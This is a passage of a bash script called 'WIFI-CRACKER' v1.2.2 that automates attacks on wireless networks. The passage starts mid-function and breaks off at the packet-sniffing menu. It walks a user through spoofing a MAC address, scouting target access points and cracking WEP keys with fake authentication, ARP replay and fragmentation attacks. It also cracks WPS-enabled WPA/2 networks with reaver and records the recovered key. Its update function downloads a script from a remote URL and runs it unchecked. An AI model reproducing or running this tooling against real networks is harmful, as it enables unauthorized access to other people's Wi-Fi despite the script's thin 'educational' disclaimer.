pause
if [ `echo -n $USER` != "root" ]
then
exit 1
fi
if [ -z `which macchanger` ] || [ -z `which aircrack-ng` ] || [ -z `which reaver` ] || [ -z `which ${TERMINAL}` ]
then
exit 2
fi
exit 4
}
###########################################################################################
#=========================================================================================#
###########################################################################################
show_logo() {
clear
echo " ___________________________________________________________________________"
echo "| _ _ ___________ _____ AUTHOR ___________ ___ _____ _ _____________ |"
echo "|| | | |_ _| ___|_ _| root / __ \ ___ \/ _ \/ __ \ | / / ___| ___ \|"
echo "|| | | | | | | |_ | | ______ | / \/ |_/ / /_\ \ / \/ |/ /| |__ | |_/ /|"
echo "|| |/\| | | | | _| | ||______|| | | /| _ | | | \| __|| / |"
echo "|\ /\ /_| |_| | _| |_ | \__/\ |\ \| | | | \__/\ |\ \ |___| |\ \ |"
echo "| \/ \/ \___/\_| \___/*v1.2.2*\____|_| \_\_| |_/\____|_| \_|____/\_| \_||"
echo "|___________________________________________________________________________|"
}
###########################################################################################
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! START UP FUNCTIONS !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!#
###########################################################################################
check_root() {
show_logo
echo "Performing start up checks..."
echo "Begin start up routine"
echo ""
echo "#################################################################"
echo "#######################CHECKING FOR ROOT#########################"
echo "#################################################################"
echo ""
if [ `echo -n $USER` != "root" ]
then
while true
do
echo "MESSAGE: ERROR: Please run as root!"
echo "You can either exit and run again through sudo ./filename.sh"
echo "Or type 1 and WIFI-CRACKER WILL REQUEST ROOT (by sudo -s)"
echo ""
echo "1. Attempt to get root"
echo "2. Exit WIFI-CRACKER"
echo ""
local choice
read -p "Enter choice [ 1 - 2 ] " choice
case $choice in
1) echo "Type your password (check the code if your afraid it's logged)" && echo "Run the script again" && echo "" && sudo -s ;;
2) f_exit ;;
*) echo -e "${RED}Error...${STD}" && sleep 2 && clear ;;
esac
done
fi
echo "MESSAGE: root access level confirmed!"
pause
}
###########################################################################################
check_dep() {
show_logo
echo "Performing start up checks..."
echo "Begin start up routine"
echo "root...............VERIFIED!"
echo ""
echo "#################################################################"
echo "######################CHECKING DEPENDENCIES######################"
echo "#############currently aircrack-ng;macchanger;reaver#############"
echo "#################################################################"
echo ""
if [ -z `which xterm` ] || [ -z `which gnome-terminal` ]
then
while true
do
echo "Which terminal do you prefer?"
echo "1. Gnome-terminal"
echo "2. XTerm"
echo "3. Enter your own terminal name"
local choice
read -p "Enter choice [ 1 - 3 ] " choice
case $choice in
1) TERMINAL="gnome-terminal" ;;
2) TERMINAL="xterm" ;;
3) read -p "Which one do you have? " ;;
*) echo "MESSAGE: YOU MUST CHOOSE A TERMINAL TO USE!" ;;
esac
local CONFIRM
echo "You choose this terminal for WIFI-CRACKER : ${TERMINAL}"
read -p "Is this information corrent [Y/n]? " CONFIRM
case $CONFIRM in
y|Y|YES|yes|Yes) break ;;
*) echo "MESSAGE: Please re-enter information" ;;
esac
done
fi
echo ""
if [ -z `which macchanger` ] || [ -z `which aircrack-ng` ] || [ -z `which reaver` ] || [ -z `which tshark` ] || [ -z `which wireshark` ]
then echo "MESSAGE: One or more of the dependencies are not installed."
pause
local CONFIRM
read -p "Would you like WIFI-CRACKER to install them [Y/n]? " CONFIRM
case $CONFIRM in
y|Y|YES|yes|Yes) check_internet && apt-get install aircrack-ng macchanger reaver tshark wireshark ${TERMINAL} && check_dep ;;
*) echo "MESSAGE: YOU MUST HAVE THE DEPENDENCIES FOR WIFI-CRACKER TO RUN!" && f_exit
esac
fi
echo "MESSAGE: Dependencies confirmed!"
pause
}
###########################################################################################
check_arg() {
show_logo
echo "Performing start up checks..."
echo "Begin start up routine"
echo "root...............VERIFIED!"
echo "dependencies.......VERIFIED!"
echo ""
echo "#################################################################"
echo "###############CHECKING IF AGRUMENTS WERE PROVIDED###############"
echo "#################################################################"
echo ""
if [ -z ${1} ] || [ -z ${2} ] || [ -z ${3} ] || [ -z ${4} ]
then
echo "MESSAGE: You haven't provided all arguments"
echo "MESSAGE: It's just another method of using this script"
echo "MESSAGE: Usage: `basename ${0}` [interface] [BSSID] [channel] [MAC]"
echo "MESSAGE: Example #`basename ${0}` wlan0"
echo "MESSAGE: If you see this, you will have to manually enter those later"
else
INTERFACE="`echo "${1}" `"
BSSID="`echo "${2}" `"
CHANNEL="`echo "${3}" `"
MAC="`echo "${4}" `"
echo "MESSAGE: You provided all the arguments"
echo "MESSAGE: Your primary interface is : ${INTERFACE}"
echo "MESSAGE: Your Target BSSID is : ${BSSID}"
echo "MESSAGE: Your Target channel is : ${CHANNEL}"
echo "MESSAGE: Your desired MAC Address is : ${MAC}"
MACINFO="ON"
fi
pause
}
###########################################################################################
last_stp_msg() {
show_logo
echo "Performing start up checks..."
echo "Begin start up routine"
echo "root...............VERIFIED!"
echo "dependencies.......VERIFIED!"
echo "script arguments...VERIFIED!"
get_mac
echo "current mac.......RETRIEVED!"
pause
}
###########################################################################################
about() {
show_logo
echo "I don't own the programs used in this script"
echo "(macchanger;aircrack-ng;reaver;tshark;wireshark)"
echo ""
echo "DISCLAIMER :"
echo "WIFI-CRACKER IS A SCRIPT DESIGNED TO AUTOMATE THE PROCESS OF CRACKING YOUR"
echo "WIRELESS NETWORK AND WAS CREATED FOR EDUCATIONNAL PURPOSES. I AM NOT IN ANY"
echo "WAY RESPONSIBLE FOR ANY CRIMES YOU COMMIT USING THIS SCRIPT!"
echo ""
echo "CHANGE LOG :"
# echo "*ALPHA-v0.1* ABILITY TO CHANGE MAC"
# echo "*ALPHA-v0.1* ABILITY TO SCOUT FOR TARGETS"
# echo "*ALPHA-v0.1* ABILITY TO CRACK A WEP PROTECTED NETWORK"
# echo "*ALPHA-v0.2* ORGANIZED IN FUNCTIONS, CLEAN UP CODE, NOW MENU DRIVEN"
# echo "*ALPHA-v0.3* SCOUTING MENU DONE; CRACKING MENU IN PROGRESS (+WPA)"
# echo "*ALPHA-v0.4* MAC SPOOF NOW HAS OPTIONS AND MENU"
# echo "*BETA -v0.5* CRACKING ALMOST DONE(+WEP PASSIVE); STARTED CLEANUP AND DEBUG"
# echo "*BETA -v0.6* ADDED ABOUT SCREEN; ADDED TERMINAL CHOICE"
# echo "*BETA -v0.7* CRACKING MENU(+CRACK FILE & AIRCRACK CONTROL)"
# echo "*BETA -v0.8* DEBUG MENU ALMOST COMPLETE; CAN CONTROL TERMINAL FROM DEBUG MENU"
# echo "*BETA -v0.9* CRACKING FINISHED (FRAGMENTATION ATTACK ADDED)"
# echo "*FINAL-v1.0* FINISHED DEBUG MENU; ADDED DOWNLOAD INFO"
echo "*v1.0* FIRST PUBLIC RELEASE"
echo "*v1.1* LOTS OF FIXES (TYPOS+CHECKS+etc.); OPTION TO ASK FOR ROOT"
echo "*v1.2* FIXES; ADDED PACKET SNIFFING MENU; ADDED UPDATE FUNCTION"
echo "*v1.2.1* FIXED MAJOR ISSUE WITH CRACKING FROM FILE METHODS AND SOME TYPOS"
echo "*v1.2.2* FIXED LOTS OF BUGS ; MADE WPA CRACKING BETTER ; ADDED CONTINUE REAVER SESSION"
echo "*TODO* FIX SCRIPT ARGUMENTS ; ADD BRUTE FORCE CRACK ; MAKE DAuth MENU"
echo ""
echo "ORIGINAL NAME : WIFI-CRACKER-by-root.sh"
echo "CURRENT NAME : `basename ${0}`"
echo "AUTHOR : root/andr920"
echo "LATEST VERSION : v1.2.2"
echo "LAST RELEASE : Tue 07 Aug 2012 - 23:32"
echo ""
echo "You can always download the newest version of this script here:"
echo "http://dl.dropbox.com/u/34008580/WIFI-CRACKER-by-root.sh"
echo "OR use the built-in updater"
echo ""
echo "If you have any issues email me at : andr920jhckrs+WIFICRACKER@gmail.com"
pause
}
###########################################################################################
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! MAIN FUNCTIONS !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!#
###########################################################################################
start_up() {
trap '' SIGINT SIGQUIT SIGTSTP
echo "Traping exit keystrokes"
check_root
check_dep
check_arg
last_stp_msg
about
main_menu
}
###########################################################################################
#==================================== OW LOOK A MENU =====================================#
main_menu() {
while true
do
show_logo
echo "~~~~~~~~~~~~~~~~~~~~~"
echo " M A I N - M E N U"
echo "~~~~~~~~~~~~~~~~~~~~~"
echo "Please choose an option"
echo "1. *MENU* Mac spoofer"
echo "2. *MENU* Target scouting"
echo "3. *MENU* Cracking *SOON -> WEP CRACK METHOD 3 and BRUTE FORCE*"
echo "4. *MENU* Packet Sniffing *NEW*"
echo "5. *MENU* DAuth *COMING SOON"
echo "6. UPDATE WIFI-CRACKER *NEW*"
echo "7. Exit WIFI-CRACK"
echo ""
echo "~ for debug MENU"
echo ""
local choice
read -p "Enter choice [ 1 - 7 ] " choice
case $choice in
1) macspoof_info ;;
2) scout_menu ;;
3) crack_menu ;;
4) sniff_menu ;;
5) echo "" echo "DAuth menu (featuring some aireplay, airdrop and maybe mdk3) *COMING SOON*" && pause ;;
6) update ;;
7) f_exit;;
"~") debug ;;
"quit") exit 5 ;;
*) echo -e "${RED}Error...${STD}" && sleep 2 && clear
esac
done
}
###########################################################################################
update() {
show_logo
echo "############################################################################"
echo "###########################UPDATING WIFI-CRACKER###########################"
echo "#################################using wget#################################"
echo "############################################################################"
check_internet
echo "update...downloading"
wget -O WIFI-CRACKER-by-root.sh http://dl.dropbox.com/u/34008580/WIFI-CRACKER-by-root.sh
echo "update...allowing to execute"
chmod +x WIFI-CRACKER-by-root.sh
echo "update...running"
./WIFI-CRACKER-by-root.sh
exit 3
}
#=========================================================================================#
###########################################################################################
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! MAC SPOOF OPTION !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!#
###########################################################################################
macspoof_info() {
show_logo
echo "############################################################################"
echo "#############################MAC SPOOFING START#############################"
echo "##############################using macchanger##############################"
echo "############################################################################"
echo ""
if [ ${MACINFO} != "ON" ]
then
while true
do
echo "MESSAGE: YOU MUST PROVIDE YOUR INTERFACE AND DESIRED MAC ADDRESS IN ORDER TO PROCEED"
change_mac
done
else
echo "MESSAGE: YOU HAVE ALREADY PROVIDED A MAC ADDRESS TO SPOOF"
pause
MACINFO="ON"
macspoof_menu
fi
}
###########################################################################################
get_mac() {
CMAC=`ifconfig ${INTERFACE} | grep ${INTERFACE} | tr -s ' ' | cut -d ' ' -f5 | cut -c 1-17`
}
#==================================== OW LOOK A MENU =====================================#
macspoof_menu() {
while true
do
show_logo
get_mac
echo "~~~~~~~~~~~~~~~~~~~~~"
echo " MAC SPOOFING MENU"
echo "~~~~~~~~~~~~~~~~~~~~~"
echo "Your current MAC : ${CMAC}"
echo "Your desired MAC : ${MAC}"
echo "Is your MAC spoofed? (STATUS: ${MACMODE})"
echo "========================================="
echo "Please choose an option"
echo "1. Change to Random vendor MAC"
echo "2. Change to Fully random MAC"
echo "3. Change to Desired MAC"
echo "4. Reset MAC"
echo "5. Change the desired MAC"
echo "6. *MENU* Go to scouting menu"
echo "7. *MENU* Go to cracking menu"
echo "8. *MENU* Exit to main menu"
echo "9. Exit WIFI-CRACKER"
echo ""
local choice
read -p "Enter choice [ 1 - 9 ] " choice
case $choice in
1) MACOPTION="-A" && macspoof;;
2) MACOPTION="-r" && macspoof;;
3) MACOPTION="-m ${MAC}" && macspoof ;;
4) reset_mac ;;
5) change_mac ;;
6) scout_menu ;;
7) crack_menu ;;
8) main_menu ;;
9) f_exit;;
"~") debug ;;
"quit") exit 5 ;;
*) echo -e "${RED}Error...${STD}" && sleep 2 && clear
esac
done
}
#=========================================================================================#
###########################################################################################
###########################################################################################
reset_mac() {
show_logo
echo "############################################################################"
echo "############################RESETING MAC ADDRESS############################"
echo "##############################using macchanger##############################"
echo "############################################################################"
echo "MAC reset is in progress."
off_mon
echo "MAC reset is in progress..bringing wireless interface down"
ifconfig ${INTERFACE} down
echo "MAC reset is in progress...applying changes with macchanger"
macchanger -p ${INTERFACE}
echo "MAC reset is in progress....bringing wireless back up"
ifconfig ${INTERFACE} up
echo "MAC reset is in progress.....DONE!"
MACMODE="OFF"
echo ""
sleep 3
}
###########################################################################################
###########################################################################################
change_mac() {
show_logo
echo "############################################################################"
echo "##########################CHANGING DESIRED MAC INFO#########################"
echo "##############################using macchanger##############################"
echo "############################################################################"
while true
do
read -p "WHAT IS YOUR PRIMARY INTERFACE ?? " INTERFACE
read -p "WHAT IS YOUR DESIRED MAC ADDRESS ?? " MAC
echo "MESSAGE: Your primary interface is : ${INTERFACE}"
echo "MESSAGE: Your desired MAC Address is : ${MAC}"
local CONFIRM
read -p "Is this information corrent [Y/n]? " CONFIRM
case $CONFIRM in
y|Y|YES|yes|Yes) MACINFO="ON" && break ;;
*) echo "MESSAGE: Please re-enter information"
esac
done
pause
macspoof_info
}
###########################################################################################
###########################################################################################
macspoof() {
show_logo
echo "############################################################################"
echo "############################SPOOFING MAC ADDRESS############################"
echo "##############################using macchanger##############################"
echo "############################################################################"
echo "MAC spoofing is in progress."
off_mon
echo "MAC spoofing is in progress..bringing wireless interface down"
ifconfig ${INTERFACE} down
echo "MAC spoofing is in progress...applying changes with macchanger"
macchanger ${MACOPTION} ${INTERFACE}
echo "MAC spoofing is in progress....bringing wireless back up"
ifconfig ${INTERFACE} up
echo "MAC spoofing is in progress.....DONE!"
MACMODE="ON"
pause
}
###########################################################################################
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! SCOUTING OPTION !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!#
###########################################################################################
#==================================== OW LOOK A MENU =====================================#
scout_menu() {
while true
do
show_logo
echo "~~~~~~~~~~~~~~~~~~~~~~~~~"
echo " TARGET SCOUTING MENU"
echo "~~~~~~~~~~~~~~~~~~~~~~~~~"
echo "MESSAGE: WHILE SCOUTING REMEMBER YOUR TARGET'S BSSID, CHANNEL"
echo "MESSAGE: YOU WILL BE PROMPTED TO SAVE THIS INFO AFTER A SCOUTING SESSION"
echo "========================================================================"
echo "YOUR PRIMARY INTERFACE IS : ${INTERFACE} ; YOUR MONITOR INTERFACE IS : ${INTERFACE2}"
echo "========================================================================"
echo "Please choose an option"
echo "1. Start scouting for WEP Targets"
echo "2. Start scouting for ALL Targets"
echo "3. Tell WIFI-CRACKER monitor mode status (STATUS: ${MONMODE})"
echo "4. Turn ON monitor mode (STATUS: ${MONMODE})"
echo "5. Turn OFF monitor mode (STATUS: ${MONMODE})"
echo "6. Change you primary and monitoring interfaces' name"
echo "7. *MENU* Continue to the cracking menu"
echo "8. *MENU* Exit to main menu"
echo "9. Exit WIFI-CRACKER"
local choice
read -p "Enter choice [ 1 - 9 ] " choice
case $choice in
1) scout_wep ;;
2) scout_all ;;
3) change_mon ;;
4) enable_mon ;;
5) off_mon ;;
6) ask_ifaces ;;
7) crack_menu ;;
8) main_menu ;;
9) f_exit ;;
"~") debug ;;
"quit") exit 5 ;;
*) echo -e "${RED}Error...${STD}" && sleep 2 && clear
esac
done
}
#=========================================================================================#
change_mon() {
echo "Select 1. OFF or 2. ON for monitor interface mode (STATUS: ${MONMODE})"
local choice
read -p "Enter choice [ 1 - 2 ] " choice
case $choice in
1) MONMODE="OFF" ;;
2) MONMODE="ON" ;;
*) change_mon ;;
esac
}
###########################################################################################
enable_mon() {
show_logo
echo "############################################################################"
echo "###########################ENABLING MONITOR MODE############################"
echo "##############################using airomon-ng##############################"
echo "############################################################################"
airmon-ng stop mon0
airmon-ng stop mon1
airmon-ng stop ${INTERFACE2}
airmon-ng stop ${INTERFACE}
airmon-ng start ${INTERFACE}
MONMODE="ON"
}
###########################################################################################
off_mon() {
show_logo
echo "############################################################################"
echo "#########################TURNNING OFF MONITOR MODE##########################"
echo "##############################using airomon-ng##############################"
echo "############################################################################"
airmon-ng stop mon0
airmon-ng stop mon1
airmon-ng stop ${INTERFACE2}
airmon-ng stop ${INTERFACE}
MONMODE="OFF"
}
###########################################################################################
ask_ifaces() {
show_logo
echo "############################################################################"
echo "#########################CHANGING INTERFACES NAMES##########################"
echo "############################################################################"
echo "WHAT IS YOUR PRIMARY INTERFACE"
while true
do
read -p "WHAT IS YOUR PRIMARY INTERFACE ??" INTERFACE
read -p "WHAT IS YOUR MONITOR INTERFACE ??" INTERFACE2
echo "MESSAGE: Your primary interface is : ${INTERFACE}"
echo "MESSAGE: Your desired MAC Address is : ${INTERFACE2}"
local CONFIRM
read -p "Is this information correct [Y/n]? " CONFIRM
case $CONFIRM in
y|Y|YES|yes|Yes) break ;;
*) echo "MESSAGE: Please re-enter information"
esac
done
pause
}
###########################################################################################
###########################################################################################
scout_wep() {
show_logo
echo "############################################################################"
echo "##########################SCOUTING FOR WEP TARGETS##########################"
echo "##############################using airodump###############################"
echo "############################################################################"
pre_crack
echo "MESSAGE: use CTRL+C to exit airodump once you've picked a target and took all"
echo " the info you need."
pause
airodump-ng --encrypt WEP ${INTERFACE2}
local CONFIRM
read -p "MESSAGE: WOULD YOU LIKE TO WRITE DOWN YOUR TARGET'S INFO NOW [Y/n]? " CONFIRM
case $CONFIRM in
y|Y|YES|yes|Yes) change_target ;;
*) echo -e "${RED}MESSAGE: YOUR CHOICE, BACK TO MENU...${STD}" && sleep 2;;
esac
}
###########################################################################################
###########################################################################################
scout_all() {
show_logo
echo "############################################################################"
echo "############################SCOUTING FOR TARGETS############################"
echo "##############################using airodump###############################"
echo "############################################################################"
pre_crack
echo "MESSAGE: use CTRL+C to exit airodump once you've picked a target and took all"
echo " the info you need."
pause
airodump-ng ${INTERFACE2}
local CONFIRM
read -p "MESSAGE: WOULD YOU LIKE TO WRITE DOWN YOUR TARGET'S INFO NOW [Y/n]? " CONFIRM
case $CONFIRM in
y|Y|YES|yes|Yes) change_target ;;
*) echo -e "${RED}MESSAGE: YOUR CHOICE, BACK TO MENU...${STD}" && sleep 2;;
esac
}
###########################################################################################
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! CRACKING OPTION !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!#
###########################################################################################
#==================================== OW LOOK A MENU =====================================#
crack_menu() {
while true
do
show_logo
echo "~~~~~~~~~~~~~~~~~~~~~~~"
echo " CRACKING WIFI MENU"
echo "~~~~~~~~~~~~~~~~~~~~~~~"
echo "========================================================================"
echo "YOUR PRIMARY INTERFACE IS : ${INTERFACE} ; YOUR MONITOR INTERFACE IS : ${INTERFACE2}"
echo "SAVE FILENAME : ${FILE} YOUR CURRENT MAC IS : ${CMAC}"
echo "========================================================================"
echo "TARGET BSSID : ${BSSID} TARGET CHANNEL : ${CHANNEL}"
echo "TARGET ESSID : ${ESSID} CURRENTLY CRACKED WIFI KEY : ${KEY}"
echo "========================================================================"
echo "Please choose an option"
echo " Have you changed your MAC yet? (STATUS: ${MACMODE})"
echo " 1. *MENU* Visit Mac spoofing menu"
echo " Haven't selected a target yet?"
echo " 2. *MENU* Visit Target scouting menu"
echo " 3. Changer your target's information"
echo " 4. WEP - Passive crack (No package generation)"
echo " 5. WEP - Active crack (might make AP unusable while attacking)"
echo " 6. WEP - Active crack with Fragmentation attack"
echo " 7. WEP - Crack a previously saved session of airodump (METHOD 1)"
echo " 8. WEP - Crack a previously saved session of airodump (METHOD 2)"
echo " 9. Use aircrack-ng (any command you want)"
echo "10. WPA - Crack WPA/2(if enabled WPS) with Reaver"
echo "11. WPA - Continue previous Reaver session *NEW*"
echo "12. Change you primary and monitoring interfaces' name"
echo "13. Tell WIFI-CRACKER monitor mode status (STATUS: ${MONMODE})"
echo "14. Turn ON monitor mode (STATUS: ${MONMODE})"
echo "15. Turn OFF monitor mode (STATUS: ${MONMODE})"
echo "16. *MENU* Exit to main menu"
echo "17. Exit WIFI-CRACKER"
local choice
read -p "Enter choice [ 1 - 17 ] " choice
case $choice in
1) macspoof_info ;;
2) scout_menu ;;
3) change_target && pause ;;
4) passive_wepcrack ;;
5) wepcrack ;;
6) wepcrack2_frag ;;
7) wepfile_crack ;;
8) wepfile_crack2 ;;
9) aircrack ;;
10) wpacrack ;;
11) wpacrack_continue ;;
12) ask_ifaces ;;
13) change_mon ;;
14) enable_mon ;;
15) off_mon ;;
16) main_menu ;;
17) f_exit ;;
"~") debug ;;
"quit") exit 5 ;;
*) echo -e "${RED}Error...${STD}" && sleep 2 && clear
esac
done
}
###########################################################################################
change_target() {
while true
do
echo ""
echo ""
echo "############################################################################"
echo "########################CHANGING TARGET INFORMATION#########################"
echo "############################################################################"
read -p "WHAT IS YOUR TARGET'S BSSID (ITS MAC ADDRESS)?? " BSSID
read -p "WHAT IS YOUR TARGET'S CHANNEL ?? " CHANNEL
read -p "WHAT IS YOUR TARGET'S ESSID (THE NAME YOU SEE) ?? " ESSID
read -p "WHAT IS YOUR DESIRED FILENAME FOR AIRODUMP SESSION ?? " FILE
echo "MESSAGE: Your target's BSSID : ${BSSID}"
echo "MESSAGE: Your target's channel : ${CHANNEL}"
echo "MESSAGE: Your target's ESSID : ${ESSID}"
echo "MESSAGE: Your airodump session file name is : ${FILE}"
local CONFIRM
read -p "Is this information corrent [Y/n]? " CONFIRM
case $CONFIRM in
y|Y|YES|yes|Yes) break ;;
*) echo "MESSAGE: Please re-enter information"
esac
done
sleep 2
}
###########################################################################################
pre_crack() {
show_logo
echo ""
echo "checking mac address spoof......"
while true
do
case ${MACMODE} in
"ON") echo "MAC MODE IS ALREADY SPOOFED!" && sleep 2 && break ;;
"OFF") macspoof && break;;
*) echo -e "${RED}Error...${STD}" && sleep 2 && clear ;;
esac
done
echo "checking mac address spoof......DONE!"
echo ""
echo "checking monitor mode......"
while true
do
case ${MONMODE} in
"ON") echo "MONITOR MODE IS ALREADY ON!" && sleep 2 && break ;;
"OFF") enable_mon && break ;;
*) echo -e "${RED}Error...${STD}" && sleep 2 && clear ;;
esac
done
echo "checking monitor mode......DONE!"
sleep 3
}
###########################################################################################
start_wepcrack() {
pre_crack
show_logo
echo "############################################################################"
echo "############################### CRACKING WEP ###############################"
echo "###########################using aircrack suite############################"
echo "############################################################################"
echo ""
echo "MESSAGE: YOU NEED AT LEAST 50000 DATA PACKETS FOR AIRCRACK TO WORK!"
pause
}
###########################################################################################
passive_wepcrack() {
start_wepcrack
echo "STEP 1 : START AIRODUMP IN NEW WINDOW"
sleep 5
${TERMINAL} -e "airodump-ng -c ${CHANNEL} -w ${FILE} --bssid ${BSSID} ${INTERFACE}" & AIRODUMPPID=$!
echo "STEP 2 : WAIT A VERY LONG TIME"
sleep 5
echo "MESSAGE: CONTINUE ONLY WHEN #DATA > 50000"
pause
echo "STEP 3 : CRACK FILE"
sleep 30
wepfile_crack
echo "killing processes..."
kill ${AIRODUMPPID}
echo "killing processes...DONE!"
pause
clean_up
}
###########################################################################################
wepcrack() {
start_wepcrack
echo "STEP 1 : START AIRODUMP IN NEW WINDOW"
sleep 5
${TERMINAL} -e "airodump-ng -c ${CHANNEL} -w ${FILE} --bssid ${BSSID} ${INTERFACE}" & AIRODUMPPID=$!
echo "STEP 2 : FAKE AUTH"
sleep 5
aireplay-ng -1 0 -a ${BSSID} -h ${CMAC} -e ${ESSID} ${INTERFACE2}
echo "STEP 3 : GENERATE PACKETS"
sleep 2
${TERMINAL} -e "aireplay-ng -3 -b ${BSSID} -h ${CMAC} ${INTERFACE2}" & AIREPLAYPID=$!
echo "STEP 4 : WAIT A LITTLE BIT"
echo "MESSAGE: CONTINUE ONLY WHEN #DATA > 50000"
pause
echo "STEP 5 : CRACK FILE"
sleep 30
wepfile_crack
echo "killing processes..."
kill ${AIRODUMPPID} && kill ${AIREPLAYPID}
echo "killing processes...DONE!"
pause
clean_up
}
###########################################################################################
wepcrack2_frag() {
start_wepcrack
echo "STEP 1 : START AIRODUMP IN NEW WINDOW"
sleep 5
${TERMINAL} -e "airodump-ng -c ${CHANNEL} --bssid ${BSSID} --ivs -w capture ${INTERFACE}" & AIRODUMPPID=$!
sleep 2
echo "STEP 2 : ASSOCIATE THEN FRAGMETATIONG ATTACK"
sleep 5
aireplay-ng -1 0 -a ${BSSID} -h ${CMAC} ${INTERFACE2}
aireplay-ng -5 -b ${BSSID} -h ${CMAC} ${INTERFACE2}
packetforge-ng -0 -a ${BSSID} -h ${CMAC} -k 255.255.255.255 -l 255.255.255.255 -y *.xor -w arp-packet ${INTERFACE2}
${TERMINAL} -e "aireplay-ng -2 -r arp-packet ${INTERFACE2}" & AIREPLAYPID=$!
echo "STEP 3 : WAIT"
sleep 5
echo "MESSAGE: CONTINUE ONLY WHEN #DATA > 50000"
pause
echo "STEP 5 : CRACK FILE"
sleep 30
wepfile_crack2
echo "killing processes..."
kill ${AIRODUMPPID} && kill ${AIREPLAYPID}
echo "killing processes...DONE!"
sleep 5
clean_up
}
###########################################################################################
wepfile_crack() {
show_logo
echo "############################################################################"
echo "###############################CRACKING FILE################################"
echo "##############################using aircrack###############################"
echo "############################################################################"
echo ""
while true
do
echo "MESSAGE: YOUR CURRENT FILE NAME IS : ${FILE}"
local CONFIRM
read -p "Would you like to change that?? [Y/n] " CONFIRM
case $CONFIRM in
y|Y|YES|yes|Yes) echo "" & read -p "What is the file name (without -01.cap) ?? " FILE & break ;;
*) echo "MESSAGE: ALRIGHT, CONTINUING...."
esac
done
echo "MESSAGE: STARTING UP AIRCRACK TO RETRIEVE KEY FROM FILE"
echo "MESSAGE: DEPENDING ON HOW MUCH PACKETS YOU'VE CAPTURED THIS COULD TAKE SOME TIME"
pause
while true
do
aircrack-ng -b ${BSSID} ${FILE}*.cap
read -p "Did aircrack-ng find the key [Y/n/cancel]" CONFIRM
case $CONFIRM in
y|Y|YES|yes|Yes|cancel|CANCEL|c|C) break ;;
*) echo "MESSAGE: ATTEMPTING TO CRACK AGAIN" & pause
esac
done
echo "MESSAGE: DROP ALL THE ":" AND USE THE KEY AS PASSWORD TO CONNECT"
store_key
pause
}
###########################################################################################
wepfile_crack2() {
show_logo
echo "############################################################################"
echo "##########################CRACKING FILE (METHOD 2)##########################"
echo "##############################using aircrack###############################"
echo "############################################################################"
echo "MESSAGE: STARTING UP AIRCRACK TO RETRIEVE KEY FROM FILE"
echo "THE FILE IS ANY .ivs THAT MATCHES YOUR CURRENT TARGET BSSID"
echo "MESSAGE: DEPENDING ON HOW MUCH PACKETS YOU'VE CAPTURED THIS COULD TAKE SOME TIME"
pause
while true
do
aircrack-ng -n 128 -b ${BSSID} *.ivs
read -p "Did aircrack-ng find the key [Y/n/cancel]" CONFIRM
case $CONFIRM in
y|Y|YES|yes|Yes|cancel|CANCEL|c|C) break ;;
*) echo "MESSAGE: ATTEMPTING TO CRACK AGAIN" & pause
esac
done
echo "MESSAGE: DROP ALL THE ":" AND USE THE KEY AS PASSWORD TO CONNECT"
store_key
pause
}
###########################################################################################
wpacrack() {
pre_crack
show_logo
echo "############################################################################"
echo "######################CRACKING WPA/2 PROTECTED NETWORK######################"
echo "################################using reaver################################"
echo "############################################################################"
echo "MESSAGE: BE SURE THAT YOU'VE ADDED THE TARGET INFORMATION FOR A WPA/2 AP"
echo "MESSAGE: NOW LAUNCHING REAVER TO CRACK WPA/2. THIS CAN TAKE FROM 4 TO 10 HOURS"
echo "MESSAGE: SIGNAL MUST BE STRONG FOR REAVER TO WORK PROPERLY!!!"
pause
reaver -i ${INTERFACE2} -b ${BSSID} -c ${CHANNEL} -e ${ESSID} -a -vv
store_key
pause
}
###########################################################################################
wpacrack_continue() {
pre_crack
while true
do
show_logo
echo "############################################################################"
echo "######################CRACKING WPA/2 PROTECTED NETWORK######################"
echo "################using reaver with a previously saved session################"
echo "############################################################################"
echo "MESSAGE: BE SURE THAT YOU'VE ADDED THE TARGET INFORMATION FOR A WPA/2 AP"
echo "MESSAGE: NOW LAUNCHING REAVER TO CRACK WPA/2. THIS CAN TAKE FROM 4 TO 10 HOURS"
echo "MESSAGE: SIGNAL MUST BE STRONG FOR REAVER TO WORK PROPERLY!!!"
pause
local SESSION
read -p "What is the name of your previously saved session (a {BUNCH OF NUMBERS HERE}.wpc file)?? " SESSION
case $SESSION in
"") echo -e "${RED}MESSAGE: ERROR, TRY AGAIN...${STD}" && sleep 2 && clear ;;
*) echo "MESSAGE: ALRIGHT, CONTINUING PREVIOUS REAVER SESSION...." && sleep 3 && break
esac
done
reaver -s ${SESSION}
store_key
pause
}
###########################################################################################
store_key() {
local CONFIRM
read -p "Would you like to write down your key [Y/n]? " CONFIRM
case $CONFIRM in
y|Y|YES|yes|Yes) echo "" &&
echo "" &&
echo "############################################################################" &&
echo "##############################SAVING WIFI KEY###############################" &&
echo "############################################################################" &&
read -p "WHAT IS THE WIFI KEY?? " KEY &&
echo "MESSAGE: The key for the WIFI YOU CRACKED IS: ${KEY}" ;;
*) echo -e "${RED}MESSAGE: YOUR CHOICE, BACK TO MENU...${STD}" && sleep 5;;
esac
}
###########################################################################################
aircrack() {
pre_crack
show_logo
echo "############################################################################"
echo "###################USE PERSONNAL COMMANDS FOR AIRCRACK-NG###################"
echo "###############################using aircrack###############################"
echo "############################################################################"
local COMMAND
read -p "What command would you like to use in aircrack-ng?? " COMMAND
echo "MESSAGE: OPENING AIRCRACK-NG IN A NEW WINDOW"
${TERMINAL} -e "aircrack-ng ${COMMAND}" & sleep 5 & pause & crack_menu
}
###########################################################################################
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! PACKET SNIFFING OPTIONS !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!#
###########################################################################################
#==================================== OW LOOK A MENU =====================================#
sniff_menu() {
while true
do
show_logo
echo "############################################################################"
echo "############################PACKET SNIFFING MENU############################"
echo "#########################using tshark and wireshark#########################"
echo "############################################################################"
echo "~~~~~~~~~~~~~~~~~~~~~~~~~"
echo " PACKET SNIFFING MENU"
